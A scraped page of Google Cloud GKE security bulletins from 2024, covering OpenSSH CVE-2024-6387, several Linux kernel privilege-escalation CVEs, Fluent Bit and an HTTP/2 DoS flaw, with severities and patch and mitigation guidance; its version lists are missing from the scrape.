Upgrade your GKE on Azure control plane and node pools to one of these patched versions or later. For instructions, see Upgrade your Azure cluster version and Update a node pool. 2024-07-02 Update: All supported versions of Ubuntu images on GKE on Azure run versions of OpenSSH that are vulnerable to this issue. GKE on Azure clusters with public node IP addresses and SSH exposed to the Internet should be treated with the highest priority for mitigation. A remote code execution vulnerability, CVE-2024-6387, was recently discovered in OpenSSH. The vulnerability exploits a race condition that could be used to obtain access to a remote shell, enabling attackers to gain root access to GKE nodes. At the time of publication, exploitation is believed to be difficult and take several hours per machine being attacked. We are not aware of any exploitation attempts. What should I do?2024-07-02 Update: A patched GKE on Azure version that includes an updated OpenSSH will be made available as soon as possible. This bulletin will be updated when patches are available. We recommend that you work through the following steps to check your cluster's exposure, and apply the described mitigations as necessary. Determine whether your nodes have public IP addressesGKE on Azure doesn't provision any machine with either public IP addresses or with firewall rules that allow traffic to port 22 by default. To review your Azure configuration to check whether there are any public IP addresses configured on your GKE on Azure cluster, run the following command: az network public-ip list -g
Disallow SSH to the cluster nodesEven though GKE on Azure doesn't allow traffic on port 22 on any node by default, customers can update NetworkSecurityGroup rules to node pools, enabling inbound SSH traffic from the public internet. We strongly recommend that you review the Network Security Groups (NSGs) associated with your Kubernetes clusters. If an NSG rule exists that allows unrestricted inbound traffic on port 22 (SSH), do one of the following:
Convert public node pools to privateTo best protect clusters with public nodes, we recommend first disallowing SSH through your security group, as described in the previous section. If you can't disallow SSH through the security group rules, you can convert public node pools to private by removing the public IP addresses associated with the VMs. To remove a public IP address from a VM and replace it with a private IP address configuration, see Dissociate a public IP address from a an Azure VM. Impact: Any existing connections using the public IP address will be disrupted. Ensure that you have alternative access methods in place, like a VPN or Azure Bastion. |
Critical |
GDC (bare metal)
Updated: 2024-07-02
Description | Severity |
---|---|
2024-07-02 Update: The original version of this bulletin for GDC software for bare metal incorrectly stated that patch versions were in progress. GDC software for bare metal is not directly affected because it doesn't manage the operating system SSH daemon or configuration. Patch versions are therefore the responsibility of the operating system provider, as described in the What should I do? section. A remote code execution vulnerability, CVE-2024-6387, was recently discovered in OpenSSH. The vulnerability exploits a race condition that could be used to obtain access to a remote shell, enabling attackers to gain root access to GKE nodes. At the time of publication, exploitation is believed to be difficult and take several hours per machine being attacked. We are not aware of any exploitation attempts. What should I do?2024-07-02 Update: Contact your OS provider to obtain a patch for the operating systems in use with GDC software for bare metal. Until you've applied the OS vendor patch, ensure that public reachable machines don't
allow SSH connections from the internet. If that isn't possible, an alternative is to
set the grep "^LoginGraceTime" /etc/ssh/sshd_config LoginGraceTime 0 Note that this configuration change might increase the risk of denial of service attacks and may cause issues with legitimate SSH access. Original 2024-07-01 text (see the preceding 2024-07-02 update for a correction): |
Critical |
GCP-2024-039
Published: 2024-06-28
Updated: 2024-09-25
Reference:
CVE-2024-26923
2024-09-25 Update: Added patch versions for GDC (VMware).
2024-08-20 Update: Added patch versions for Ubuntu node pools on GKE.
GKE
Updated: 2024-08-20
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted. What should I do?2024-08-20 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GDC (VMware)
Updated: 2024-09-25
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?2024-09-25 Update: The following versions of GDC software for VMware are updated with code to fix this vulnerability. Upgrade your GDC software for VMware clusters to the following versions or later:
|
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GDC (bare metal)
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?There is no action required. GDC software for bare metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-038
Published: 2024-06-26
Updated: 2024-09-17
Reference:
CVE-2024-26924
2024-09-17 Update: Added patch versions for GDC (VMware).
2024-08-06 Update: Added patch versions for Ubuntu node pools on GKE.
GKE
Updated: 2024-08-06
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted. What should I do?2024-08-06 Update: Added patch versions for Ubuntu node pools on GKE. The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GDC (VMware)
Updated: 2024-09-17
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?2024-09-17 Update: The following versions of GDC software for VMware are updated with code to fix this vulnerability. Upgrade your GDC software for VMware clusters to the following versions or later:
|
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GDC (bare metal)
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?There is no action required. GDC software for bare metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-036
Published: 2024-06-18
Reference:
CVE-2024-26584
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted. What should I do?The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
What should I do?There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-035
Published: 2024-06-12
Updated: 2024-07-18
Reference:
CVE-2024-26584
2024-07-18 Update: Added patch versions for Ubuntu node pools on GKE and added a patch version for version 1.27 on Container-Optimized OS node pools.
GKE
Updated: 2024-07-18
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted. What should I do?2024-07-18 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to one of the following patch versions or later:
The following version of GKE is updated with code to fix this vulnerability on Container-Optimized OS. Upgrade your Container-Optimized OS node pools to the following patch version or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected but don't have a patch version available. We'll update this bulletin when patch versions are available:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-034
Published: 2024-06-11
Updated: 2024-07-10
Reference:
CVE-2024-26583
2024-07-10 Update: Added patch versions for Container-Optimized OS nodes running minor version 1.26 and 1.27 and added patch versions for Ubuntu nodes.
GKE
Updated: 2024-07-10
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted. What should I do?2024-07-10 Update: The following versions of GKE are updated with code to fix this vulnerability. Upgrade your Ubuntu node pools to one of the following patch versions or later:
For minor versions 1.26 and 1.27, upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
What should I do?There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-033
Published: 2024-06-10
Updated: 2024-09-26
Reference:
CVE-2022-23222
2024-09-26 Update: Added patch versions for GDC (VMware).
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted. What should I do?The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Updated: 2024-09-26
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
What should I do?2024-09-26 Update: The following versions of GDC software for VMware are updated with code to fix this vulnerability. Upgrade your GDC software for VMware clusters to the following versions or later:
|
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
What should I do?There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-031
Published: 2024-05-24
Reference: CVE-2024-4323
GKE
Description | Severity |
---|---|
A new vulnerability (CVE-2024-4323) has been discovered in Fluent Bit that could result in remote code execution. Fluent Bit versions 2.0.7 through 3.0.3 are affected. GKE doesn't use a vulnerable version of Fluent Bit, and is unaffected. What should I do?GKE isn't affected by this vulnerability. No action is required. |
None |
GKE on VMware
Description | Severity |
---|---|
A new vulnerability (CVE-2024-4323) has been discovered in Fluent Bit that could result in remote code execution. Fluent Bit versions 2.0.7 through 3.0.3 are affected. GKE on VMware doesn't use a vulnerable version of Fluent Bit, and is unaffected. What should I do?GKE on VMware isn't affected by this vulnerability. No action is required. |
None |
GKE on AWS
Description | Severity |
---|---|
A new vulnerability (CVE-2024-4323) has been discovered in Fluent Bit that could result in remote code execution. Fluent Bit versions 2.0.7 through 3.0.3 are affected. GKE on AWS doesn't use a vulnerable version of Fluent Bit, and is unaffected. What should I do?GKE on AWS isn't affected by this vulnerability. No action is required. |
None |
GKE on Azure
Description | Severity |
---|---|
A new vulnerability (CVE-2024-4323) has been discovered in Fluent Bit that could result in remote code execution. Fluent Bit versions 2.0.7 through 3.0.3 are affected. GKE on Azure doesn't use a vulnerable version of Fluent Bit, and is unaffected. What should I do?GKE on Azure isn't affected by this vulnerability. No action is required. |
None |
GKE on Bare Metal
Description | Severity |
---|---|
A new vulnerability (CVE-2024-4323) has been discovered in Fluent Bit that could result in remote code execution. Fluent Bit versions 2.0.7 through 3.0.3 are affected. GKE on Bare Metal doesn't use a vulnerable version of Fluent Bit, and is unaffected. What should I do?GKE on Bare Metal isn't affected by this vulnerability. No action is required. |
None |
GCP-2024-030
Published: 2024-05-15
Updated: 2024-07-18
Reference:
CVE-2023-52620
2024-07-18 Update: Added patch versions for Ubuntu node pools on GKE.
GKE
Updated: 2024-07-18
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted. What should I do?2024-07-18 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-029
Published: 2024-05-14
Updated: 2024-08-19
Reference:
CVE-2024-26642
2024-08-19 Update: Added patch versions for Ubuntu nodes.
GKE
Updated: 2024-08-19
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted. What should I do?2024-08-19 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-028
Published: 2024-05-13
Updated: 2024-05-22
Reference:
CVE-2024-26581
2024-05-22 Update: Added patch versions for Ubuntu nodes.
GKE
Updated: 2024-05-22
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted. What should I do?2024-05-22 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-027
Published: 2024-05-08
Updated: 2024-09-25
Reference:
CVE-2024-26808
2024-09-25 Update: Added patch versions for GDC (VMware).
2024-05-15 Update: Added patch versions for GKE Ubuntu node pools.
2024-05-09 Update: Corrected severity from Medium to High and clarified that GKE Autopilot clusters in the default configuration are not impacted.
GKE
Updated: 2024-05-09, 2024-05-15
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
2024-05-09 Update: Corrected severity from Medium to High.
The original bulletin stated Autopilot
clusters are impacted, but this was incorrect. GKE Autopilot
clusters in the default configuration are not impacted, but might be vulnerable if you
explicitly set the seccomp Unconfined profile or
allow GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted. What should I do?2024-05-15 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Updated: 2024-09-25
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?2024-09-25 Update: The following versions of GDC software for VMware are updated with code to fix this vulnerability. Upgrade your GDC software for VMware clusters to the following versions or later:
|
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-026
Published: 2024-05-07
Updated: 2024-08-06
Reference:
CVE-2024-26643
2024-08-06 Update: Added patch versions for Ubuntu node pools on GKE.
2024-05-09 Update: Corrected severity from Medium to High.
GKE
Updated: 2024-08-06
Description | Severity |
---|---|
2024-05-09 Update: Corrected severity from Medium to High. The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted. What should I do?2024-08-06 Update: Added patch versions for Ubuntu node pools on GKE. The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-024
Published: 2024-04-25
Updated: 2024-07-18
Reference:
CVE-2024-26585
2024-07-18 Update: Added patch versions for Ubuntu node pools on GKE.
GKE
Updated: 2024-07-18
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted. What should I do?2024-07-18 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-022
Published: 2024-04-03
Updated: 2024-07-17
Reference: CVE-2023-45288
2024-07-17 Update: Added patch versions for GKE on VMware.
2024-07-09 Update: Added patch versions for GKE on Bare Metal.
2024-04-24 Update: Added patch versions for GKE.
GKE
Updated: 2024-04-24
Description | Severity |
---|---|
A Denial-of-Service (DoS) vulnerability (CVE-2023-45288) was recently discovered in multiple implementations of the HTTP/2 protocol, including the golang HTTP server used by Kubernetes. The vulnerability could lead to a DoS of the Google Kubernetes Engine (GKE) control plane. GKE clusters with authorized networks configured are protected by limiting network access, but all other clusters are affected. GKE Autopilot and Standard clusters are affected. What should I do?2024-04-24 Update: Added patch versions for GKE. The following versions of GKE include the Golang security patches to fix this vulnerability. Upgrade your GKE clusters to the following versions or later:
The golang project released patches on April 3, 2024. We'll update this bulletin when GKE versions that incorporate these patches are available. To request a patch on an accelerated timeline, contact support. Mitigate by configuring authorized networks for control plane access:You can mitigate your clusters from this class of attacks by configuring authorized networks. Follow the instructions to enable authorized networks for an existing cluster. To learn more about how authorized networks control access to the control plane, see How authorized networks work. To see the default authorized network access, view the table in the Access to control plane endpoints section. What vulnerabilities are addressed by this patch?The vulnerability (CVE-2023-45288) allows an attacker to execute a DoS attack on Kubernetes control plane. |
High |
GKE on VMware
Updated: 2024-07-17
Description | Severity |
---|---|
A Denial-of-Service (DoS) vulnerability (CVE-2023-45288) was recently discovered in multiple implementations of the HTTP/2 protocol, including the golang HTTP server used by Kubernetes. The vulnerability could lead to a DoS of the Google Kubernetes Engine (GKE) control plane. What should I do?2024-07-17 Update: Added patch versions for GKE on VMware. The following versions of GKE on VMware include code to fix this vulnerability. Upgrade your GKE on VMware clusters to the following versions or later:
The golang project released patches on April 3, 2024. We'll update this bulletin when GKE on VMware versions that incorporate these patches are available. To request a patch on an accelerated timeline, contact support. What vulnerabilities are addressed by this patch?The vulnerability (CVE-2023-45288) allows an attacker to execute a DoS attack on Kubernetes control plane. |
High |
GKE on AWS
Description | Severity |
---|---|
A Denial-of-Service (DoS) vulnerability (CVE-2023-45288) was recently discovered in multiple implementations of the HTTP/2 protocol, including the golang HTTP server used by Kubernetes. The vulnerability could lead to a DoS of the Google Kubernetes Engine (GKE) control plane. What should I do?The golang project released patches on April 3, 2024. We'll update this bulletin when GKE on AWS versions that incorporate these patches are available. To request a patch on an accelerated timeline, contact support. What vulnerabilities are addressed by this patch?The vulnerability (CVE-2023-45288) allows an attacker to execute a DoS attack on Kubernetes control plane. |
High |
GKE on Azure
Description | Severity |
---|---|
A Denial-of-Service (DoS) vulnerability (CVE-2023-45288) was recently discovered in multiple implementations of the HTTP/2 protocol, including the golang HTTP server used by Kubernetes. The vulnerability could lead to a DoS of the Google Kubernetes Engine (GKE) control plane. What should I do?The golang project released patches on April 3, 2024. We'll update this bulletin when GKE on Azure versions that incorporate these patches are available. To request a patch on an accelerated timeline, contact support. What vulnerabilities are addressed by this patch?The vulnerability (CVE-2023-45288) allows an attacker to execute a DoS attack on Kubernetes control plane. |
High |
GKE on Bare Metal
Updated: 2024-07-09
Description | Severity |
---|---|
A Denial-of-Service (DoS) vulnerability (CVE-2023-45288) was recently discovered in multiple implementations of the HTTP/2 protocol, including the golang HTTP server used by Kubernetes. The vulnerability could lead to a DoS of the Google Kubernetes Engine (GKE) control plane. What should I do?2024-07-09 Update: Added patch versions for GKE on Bare Metal. The following versions of GKE on Bare Metal include code to fix this vulnerability. Upgrade your GKE on Bare Metal clusters to the following versions or later:
The golang project released patches on April 3, 2024. We'll update this bulletin when GKE on Bare Metal versions that incorporate these patches are available. To request a patch on an accelerated timeline, contact support. What vulnerabilities are addressed by this patch?The vulnerability (CVE-2023-45288) allows an attacker to execute a DoS attack on Kubernetes control plane. |
High |
GCP-2024-018
Published: 2024-03-12
Updated: 2024-05-06
Reference:
CVE-2024-1085
2024-05-06 Update: Added patch versions for GKE Ubuntu node pools and removed an extra horizontal line element from the 2024-04-04 update.
2024-04-04 Update: Corrected minimum versions for GKE Container-Optimized OS node pools.
GKE
Updated: 2024-05-06
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted. What should I do?2024-05-06 Update: The following versions of GKE are updated with code to fix this vulnerability in Ubuntu. Upgrade your Ubuntu node pools to the following versions or later.
2024-04-04 Update: Corrected minimum versions for GKE Container-Optimized OS node pools. The minimum GKE versions containing the Container-Optimized OS fixes listed previously were incorrect. The following versions of GKE are updated with code to fix this vulnerability on Container-Optimized OS. Upgrade your Container-Optimized OS node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
